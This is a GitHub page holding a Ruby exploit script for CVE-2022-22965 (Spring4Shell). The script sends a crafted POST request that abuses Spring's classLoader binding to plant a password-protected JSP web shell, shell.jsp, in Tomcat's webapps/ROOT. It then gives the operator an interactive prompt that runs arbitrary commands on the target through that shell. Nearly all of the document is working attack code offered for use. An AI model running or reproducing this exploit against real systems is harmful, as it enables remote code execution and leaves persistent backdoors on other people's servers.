-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathCVE-2022-22965.rb
More file actions
executable file
·83 lines (71 loc) · 2.87 KB
/
Copy pathCVE-2022-22965.rb
File metadata and controls
executable file
·83 lines (71 loc) · 2.87 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
#!/usr/bin/ruby
#
# CVE-2022-22965 | Spring4Shell Exploit in Ruby
# Coded By Habib | Twitter @hab1b0x | LinkedIn @habib0x
# Date | 15/04/2022 - 11:02 AM
#
require 'net/http'
require 'openssl'
require 'uri'
require 'readline'
def title
puts """
# c c wWw wWw -2022-22965
# (OO) (O) (O) wWw
# ,'.--.) ( \ / ) (O)_
# / //_|_\ \ \ / / .' __)
# | \___ / \/ \ ( _)
# '. ) \ `--' / `.__)
# `-.' `-..-'
# Author:Habib
# ruby CVE-2022-22965.rb target_url
# ruby CVE-2022-22965.rb http://localhost
"""
end
# if no arguments are given, show title & usage
if ARGV.empty?
title()
exit 0
end
# Get Target from stdin
target = ARGV[0]
# Check if target is valid
if not target.start_with?('http')
target = 'http://' + target
end
# Generate full url for launching the attack
url = "#{target}"
uri = URI(url)
http = Net::HTTP.new(uri.host, uri.port)
# Use SSL/TLS if needed
if uri.scheme == 'https'
http.use_ssl = true
http.verify_mode = OpenSSL::SSL::VERIFY_NONE
end
# Initiate The Request for the attack
req = Net::HTTP::Post.new(uri.request_uri)
req["User-Agent"] = "Habib0x"
req["Cookie"] = "JSESSIONID=6E7E484B4224DC148F4E67F9027122AA"
req["c0"] = "%>//"
req["c1"] = "Runtime"
req["c2"] = "<%"
req["Content-Type"] = "application/x-www-form-urlencoded"
req["Connection"] = "close"
req.set_form_data({"class.module.classLoader.resources.context.parent.pipeline.first.suffix"=>".jsp","class.module.classLoader.resources.context.parent.pipeline.first.pattern"=>"%{c2}i if(\"j\".equals(request.getParameter(\"pwd\"))){ java.io.InputStream in = %{c1}i.getRuntime().exec(request.getParameter(\"cmd\")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } %{c0}i","class.module.classLoader.resources.context.parent.pipeline.first.prefix"=>"shell","class.module.classLoader.resources.context.parent.pipeline.first.directory"=>"webapps/ROOT","class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat"=>""})
# Check Response
res = http.request(req)
if res.code == "200"
puts "[+] Target is exploitable !!"
puts "[+] JSP Shell: #{target}/shell.jsp?pwd=j&cmd=CMD"
puts "[+] Type your commands (exit to quit) and press Enter!"
trap('INT', 'SIG_IGN')
loop do
command = Readline.readline('Spring4Shell-> ', true)
next if command.empty?
exit! if command =~ /exit/
exploit_uri = URI(target + "/shell.jsp?pwd=j&cmd=#{command}")
puts Net::HTTP.get_response(exploit_uri).body
end
else
puts "[-] Target is not exploitable !! ~ Response: " + res.code
end